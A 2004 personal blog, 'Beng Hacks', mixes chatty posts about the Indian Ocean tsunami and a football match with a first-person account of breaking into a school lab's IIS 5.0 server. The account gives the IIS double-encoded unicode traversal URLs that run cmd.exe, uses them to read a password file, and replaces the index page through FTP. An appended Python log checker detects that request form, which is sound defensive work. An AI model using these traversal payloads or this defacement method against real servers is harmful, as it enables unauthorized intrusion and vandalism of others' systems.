Beng Hacks: December 2004

Wednesday, December 29, 2004

Tragic yet disgustingly exciting

I feel damn guilty, knowing that I was out having fun with my pals while around the world, ppl were dying coz of the tidal waves. When I read the news I tot it was only a small deal, but now it's 80,000 dead and counting. Sigh...

Yet, as I watch more footage of the tidal waves and see more pics, I'm more and more excited by them. How big were the waves? I remember the show Deep Impact where the waves were damn big. Some ppl said the waves were 10 metres tall! That's about 2-3 storeys! No wonder some ppl can die just as the waves hit. The force prolly smash them against walls or furniture. Am I wrong to feel excited seeing the waves?

Good news tho, Lions kicked puak chao Myanmar's ass 4 goals to 3. So freaking rough, the referee can go home and sleep liao, so many red and yellow cards didn't give, maybe he scared murdered by the fans in the carpark after the match. Best was 3rd SG goal, the player obviously stamped on our guy yet no red. Good that we scored on the free kick!

Go Lions!

Tuesday, December 21, 2004

Internet code proved to be killer giveaway

A siao woman in the US who cut out another woman's 8 mth old baby to steal it, got caught after she posted a message to buy a dog and the police traced her via IP address (dialup LOL!) to her house.

Being clever is fine, just don't act too clever!

Hit and Run

Ok, here's what happened. First thing hackers always do is enumerate. Wat this means is to find out what the target is all about. I knew the server was running a web and ftp server. These are the important things I found out:

220 chan-lanlab2 Microsoft FTP Service (Version 5.0).

and

Server: Microsoft-IIS/5.0
Date: Tue, 15 Dec 2004 03:12:52 GMT
Content-Type: text/html
Content-Length: 87

So, the server was running Windows NT and/or 2000, or so I guessed =]. There was no way for me to tell what service pack the server was running so I had no choice but to trial and error. I tried a unicode hack:

http://chan-lanlab2/..%255c../winnt/system32/cmd.exe?/c+dir

a well-known hack where IIS will change the "%255c" into "/" and properly execute the URL. If the website was hosted on the default location, i.e. C:\Inetpub\wwwroot\, then this URL will effectively execute C:\winnt\system32\cmd.exe and run the command dir, listing the current folder. The folder listed would be the website's folder.

And... voila!

Directory of C:\Lab02
...
05/11/2004 02:58p 4,786 index.htm
11/29/2004 05:17p <DIR> Lab
12/16/2004 06:07p 1,337 printenv.cgi
06/24/2004 01:20p 33 pwd
11/29/2004 02:20p <DIR> Temp
11/29/2004 02:20p <DIR> Tute
06/24/2004 01:29p 1,295 upload.cgi
06/24/2004 01:17p 945 upload.htm
...

With cmd.exe access I could execute any DOS command I want, straight from the browser! Whoa! A pwd file! I quickly put this into the URL:

http://chan-lanlab2/..%255c../winnt/system32/cmd.exe?/c+type+pwd


which will type out the contents of the pwd file and got:

v¦ªx£e>(¦mí±a@>D ?¦+?O+pKê?W¦¦µ`4


Shit some encrypted username and password. Viewing the upload.cgi file, dunno what language but seemed it was using AES so I dun think I can bruteforce this. Sianz thot I could use his upload form to put my stuff inside. Then it hit me, maybe the FTP server (u know lah, we can upload our assignments there) puts the files into somewhere in this folder? Listing the Temp folder confirmed my guess! It contained folders of all the PC # accounts:

Directory of C:\Lab02\Temp
...
11/29/2004 02:21p PC01
11/29/2004 02:21p PC02
...


So... I quickly FTP'ed a modified copy of the index.htm (with the Hacks logo img tag lah) and hacks.gif using my PC in the lab (PC11). Issuing a copy URL command into the browser I copied the files from the PC11 folder over to C:\lab02 and overwrote the original index.htm!!! Success!!

Cookie for me? =]
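
A log-review check for the request form in this post, as an added example that is not from the original blog: it percent-decodes the logged path repeatedly and reports on which pass a `..` segment first appears, since `%255c` only turns into a path separator on the second decode, after a decode-once-then-check filter has already passed it. The function names, the five-pass cap and the sample targets other than the post's own URL are constructed for illustration.

```python
import re
from urllib.parse import unquote

MAX_PASSES = 5  # assumption: cap on decode rounds for this sketch

def decode_passes(raw_target):
    """Return the path as logged plus each further percent-decoded form."""
    path = raw_target.split("?", 1)[0]   # the query string is not part of the path
    forms = [path]
    for _ in range(MAX_PASSES):
        nxt = unquote(forms[-1], encoding="latin-1")
        if nxt == forms[-1]:
            break                        # stable: nothing left to decode
        forms.append(nxt)
    return forms

def has_parent_segment(path):
    """True if any segment is '..', treating both / and \\ as separators."""
    return ".." in re.split(r"[\\/]", path)

def classify(raw_target):
    """Return (verdict, number of decodes needed to expose the finding)."""
    forms = decode_passes(raw_target)
    for i, form in enumerate(forms):
        if has_parent_segment(form):
            # i <= 1 is seen by a normal decode-then-check; i >= 2 slips past it
            return ("traversal" if i <= 1 else "double-encoded-traversal", i)
    if len(forms) > 2:
        return ("re-encoded", len(forms) - 1)
    return ("ok", 0)

# Constructed request targets; the last one is the form quoted in the post.
SAMPLES = [
    "/index.htm",
    "/Tute/100%25.htm",
    "/Lab/../pwd",
    "/Lab%2f..%2fpwd",
    "/..%255c../winnt/system32/cmd.exe?/c+dir",
]

if __name__ == "__main__":
    for target in SAMPLES:
        print(classify(target), target)
```

A finding at pass 2 or later is the one to alert on. On the server side the matching fix is to canonicalize the path fully before any path check is made.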

Monday, December 13, 2004

Mission Possible

Codename: Mission Possible.
Location: Somewhere with fast yummy food.
Time: Breakfast.
Mission Brief: Your mission, if you choose to accept it, will be to put the or-e-or logo on chan-lanlab2 without detection, preferably on the index page. Enumerate, obfuscate and penetrate. This message will self-destruct in 5 years.

Hi!

Hi hi! =] How come no one post liao? =P

Thursday, December 09, 2004

Ta-Da!

Lai lai, didn't I mention that I would create this blog? Some people dared me and I dared! You think bengs cannot do this kind of thing meh? I hav special talents de... dun siao kan me ok!

Intro intro! We are the Beng Hacks! Hacks Hacks Orr Ee Orr!! Chao ah beng oso can hack what, you think oni ACS or RI bananas can hack meh? Quite easy wat...

So in the end, come come! Inferno where are you!?